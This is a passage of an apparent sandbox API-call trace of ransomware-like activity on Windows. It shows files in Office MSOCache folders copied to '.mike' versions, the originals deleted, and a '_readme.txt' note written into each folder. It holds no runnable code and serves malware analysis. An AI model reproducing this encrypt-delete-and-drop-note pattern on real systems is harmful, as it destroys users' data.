(hObject=0x264) returned 1 [0040.417] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.417] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.417] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe24867e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe24867e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24ac940, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb60)) returned 1 [0040.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.417] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.417] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.417] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x20feba4 | out: lpFileInformation=0x20feba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe24867e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe24867e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24ac940, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb60)) returned 1 [0040.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.417] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.417] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0040.418] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.418] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0040.419] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.419] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.419] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.419] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.419] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.420] GetFileType (hFile=0x264) returned 0x1 [0040.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.420] GetFileType (hFile=0x264) returned 0x1 [0040.420] WriteFile (in: hFile=0x264, lpBuffer=0x2100888*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2100888*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.421] CloseHandle (hObject=0x264) returned 1 [0040.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.421] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.421] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.421] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe24867e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24ac940, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.421] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe24867e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24ac940, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.421] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0040.422] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2460680, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2460680, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24867e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x790, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.xml.mike", cAlternateFileName="OFFICE~1.MIK")) returned 1 [0040.422] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0040.422] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe24867e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe24867e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24ac940, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0040.422] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe24867e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe24867e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24ac940, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.422] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe24867e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe24867e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe24ac940, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.422] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.423] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.423] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.423] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.423] CoTaskMemFree (pv=0x4fe370) [0040.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.423] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.423] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.423] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.423] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.469] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.469] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0040.469] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0040.470] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0040.470] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.470] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.470] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.471] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpFilePart=0x0) returned 0x48 [0040.471] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", lpFilePart=0x0) returned 0x4e [0040.471] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.471] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.471] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.471] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.472] GetFileType (hFile=0x264) returned 0x1 [0040.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.472] GetFileType (hFile=0x264) returned 0x1 [0040.472] CloseHandle (hObject=0x264) returned 1 [0040.472] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.472] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.472] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.472] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.473] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x210a000 | out: lpFileInformation=0x210a000*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf)) returned 1 [0040.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.473] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.473] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x210a340 | out: lpFileInformation=0x210a340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf)) returned 1 [0040.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.473] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.473] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.473] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.473] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.473] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", 